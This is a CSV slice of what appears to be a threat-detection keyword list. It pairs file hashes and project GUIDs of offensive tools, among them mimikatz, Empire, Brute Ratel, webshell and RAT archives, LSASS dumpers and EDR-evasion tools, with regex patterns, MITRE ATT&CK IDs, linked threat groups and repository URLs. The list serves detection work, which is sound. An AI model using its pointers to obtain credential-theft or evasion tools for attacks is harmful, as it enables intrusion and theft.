"*2bdb8c20d1daf819c4f7722597563277e1dc4ca160b29feafc269f270baa9e2f*",".{0,1000}2bdb8c20d1daf819c4f7722597563277e1dc4ca160b29feafc269f270baa9e2f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23840"
"*2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d*",".{0,1000}2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23842"
"*2be38840c44daccf05553b5f2b60ee1344af95f9386c458317d353fd2d5aea5e*",".{0,1000}2be38840c44daccf05553b5f2b60ee1344af95f9386c458317d353fd2d5aea5e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23844"
"*2bedfede524b3c27ab02fcdc3fd4b7e54c1aa83cad0e7642ff4c70700f51355a*",".{0,1000}2bedfede524b3c27ab02fcdc3fd4b7e54c1aa83cad0e7642ff4c70700f51355a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23847"
"*2beff60039dfd82bd092bae6e69a92ed04cdcf7cfe597868bb161dbc15c3de73*",".{0,1000}2beff60039dfd82bd092bae6e69a92ed04cdcf7cfe597868bb161dbc15c3de73.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","23848"
"*2c03dc7ed9a0770af9e8ba9c8fffa0e8b8ffcdf1f7efe5d2d33a32fe736989cd*",".{0,1000}2c03dc7ed9a0770af9e8ba9c8fffa0e8b8ffcdf1f7efe5d2d33a32fe736989cd.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","23852"
"*2C059FE7-C868-4C6D-AFA0-D62BA3C1B2E1*",".{0,1000}2C059FE7\-C868\-4C6D\-AFA0\-D62BA3C1B2E1.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","23853"
"*2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07*",".{0,1000}2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23854"
"*2c0a115ffe1cb4d1672aa77035349763e0c2814bb9ffce04ee368c1b7874ac89*",".{0,1000}2c0a115ffe1cb4d1672aa77035349763e0c2814bb9ffce04ee368c1b7874ac89.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23855"
"*2c0a644ec77673d8ec16808a8ac299733ee6e91a3fed0c8da41d6d73812b0d29*",".{0,1000}2c0a644ec77673d8ec16808a8ac299733ee6e91a3fed0c8da41d6d73812b0d29.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23856"
"*2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351*",".{0,1000}2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23858"
"*2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351*",".{0,1000}2c1873b4fdd1abde90702784cb5870a06c8fe662cfc428c018d9052c89421351.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23859"
"*2c23b4591d5a5909374fe009ddc2c97372254adb0ed0d63166445577456a5d55*",".{0,1000}2c23b4591d5a5909374fe009ddc2c97372254adb0ed0d63166445577456a5d55.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23860"
"*2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1*",".{0,1000}2c25e65ae97f9652d4ab24abcc8c75a48e9b0446211feaeb0e8b138176086ef1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23861"
"*2c2ce45452521b88663a2ecba9eb2fd7605b3a2d67924bb59e9f318a2a26c82d*",".{0,1000}2c2ce45452521b88663a2ecba9eb2fd7605b3a2d67924bb59e9f318a2a26c82d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23863"
"*2c2e002d5b85945c8f2d74211bf936268e37d086c4987c14909ade7fb2460e9a*",".{0,1000}2c2e002d5b85945c8f2d74211bf936268e37d086c4987c14909ade7fb2460e9a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23864"
"*2c2e4a89c50f2f7fdb136b2435074b271f0574b0fa4629aacb6cffbc05d5940b*",".{0,1000}2c2e4a89c50f2f7fdb136b2435074b271f0574b0fa4629aacb6cffbc05d5940b.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23865"
"*2c3443b8a35d6734ff6a8e6c045bc0c65f134ae0a2937ec8986447113e9a3b98*",".{0,1000}2c3443b8a35d6734ff6a8e6c045bc0c65f134ae0a2937ec8986447113e9a3b98.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23866"
"*2c45a08d77284fedd8074a5664e7c2424a94c6d131540010da2e73d8f520ebe7*",".{0,1000}2c45a08d77284fedd8074a5664e7c2424a94c6d131540010da2e73d8f520ebe7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23868"
"*2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0*",".{0,1000}2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23869"
"*2c48923740a4fa2979907d801e7552ed940f19dca8e914898ca48b46b1f2330d*",".{0,1000}2c48923740a4fa2979907d801e7552ed940f19dca8e914898ca48b46b1f2330d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23870"
"*2c49f9006a48adaa0445950dcf5fe02141c0891c5fd23bec5e9f9fcd8ef8f291*",".{0,1000}2c49f9006a48adaa0445950dcf5fe02141c0891c5fd23bec5e9f9fcd8ef8f291.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23872"
"*2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd*",".{0,1000}2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23873"
"*2c511a9099fe0f45494a74446a1938f755a5f783c6ed40def55c2fe99543a571*",".{0,1000}2c511a9099fe0f45494a74446a1938f755a5f783c6ed40def55c2fe99543a571.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23875"
"*2c64db7c942c64fee5fa3ec20a40b21172b91108b4d70a4db92edc5f6ae21d78*",".{0,1000}2c64db7c942c64fee5fa3ec20a40b21172b91108b4d70a4db92edc5f6ae21d78.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23877"
"*2c68949149436d573a53536888f124ada95ad5ce87962fbd2f349fb7693bf0e1*",".{0,1000}2c68949149436d573a53536888f124ada95ad5ce87962fbd2f349fb7693bf0e1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23878"
"*2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de*",".{0,1000}2c68f74c83b924d84b0de8e4a75a44964ad5bf934d3b9ba0baec9732b70183de.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23879"
"*2C6D323A-B51F-47CB-AD37-972FD051D475*",".{0,1000}2C6D323A\-B51F\-47CB\-AD37\-972FD051D475.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#GUIDproject","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","23880"
"*2c71826f310dd00b72e4838d3143745bc68d45e8d88f71c7c22caaabffbc4010*",".{0,1000}2c71826f310dd00b72e4838d3143745bc68d45e8d88f71c7c22caaabffbc4010.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23881"
"*2c71dd5b47601d4b105d8da7007511045dd58f5d71b997290209d55f20dce887*",".{0,1000}2c71dd5b47601d4b105d8da7007511045dd58f5d71b997290209d55f20dce887.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","23882"
"*2c74050e41d9db2a3931b8d587dd3d1b9b73f6a428ea8c131d236ef6c1512752*",".{0,1000}2c74050e41d9db2a3931b8d587dd3d1b9b73f6a428ea8c131d236ef6c1512752.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23883"
"*2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a*",".{0,1000}2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23884"
"*2c7b76a89a8b9696eefc5144c590804f295ff593c9168c773d0b644c69acef8a*",".{0,1000}2c7b76a89a8b9696eefc5144c590804f295ff593c9168c773d0b644c69acef8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23886"
"*2C809982-78A1-4F1C-B0E8-C957C93B242F*",".{0,1000}2C809982\-78A1\-4F1C\-B0E8\-C957C93B242F.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#GUIDproject","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","23887"
"*2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7*",".{0,1000}2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23889"
"*2c96a3a04b62c87a9e5179230186d006f49dca951b230c1db6a543d5ee5ef2b6*",".{0,1000}2c96a3a04b62c87a9e5179230186d006f49dca951b230c1db6a543d5ee5ef2b6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23890"
"*2c9c88011cd2b1c1af8c1a3dc31036ac22730723c50912e0f5c832f2a40b8b96*",".{0,1000}2c9c88011cd2b1c1af8c1a3dc31036ac22730723c50912e0f5c832f2a40b8b96.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23891"
"*2c9fbc55ba53269120d7fb4fa0f7d5ba0e3ca8acc86385eeadb330ece4510090*",".{0,1000}2c9fbc55ba53269120d7fb4fa0f7d5ba0e3ca8acc86385eeadb330ece4510090.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23893"
"*2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676*",".{0,1000}2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23894"
"*2cb57e3d7d12179f6e3388a62b906a138995da22a57e389079df8def186afc00*",".{0,1000}2cb57e3d7d12179f6e3388a62b906a138995da22a57e389079df8def186afc00.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23897"
"*2cc9517df6d1839ac8bd5077a34ad43f2377e0e4fc9c024f5f9e44b150b94baf*",".{0,1000}2cc9517df6d1839ac8bd5077a34ad43f2377e0e4fc9c024f5f9e44b150b94baf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23900"
"*2cca313664b8df442b02f4115925c4803262da9df7f3efa84880357b16333f11*",".{0,1000}2cca313664b8df442b02f4115925c4803262da9df7f3efa84880357b16333f11.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","23901"
"*2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc*",".{0,1000}2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23904"
"*2cda68c8689a88d29b03ac53f3b10662971e95d2c6aa43970c76c0532a4dcfad*",".{0,1000}2cda68c8689a88d29b03ac53f3b10662971e95d2c6aa43970c76c0532a4dcfad.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23905"
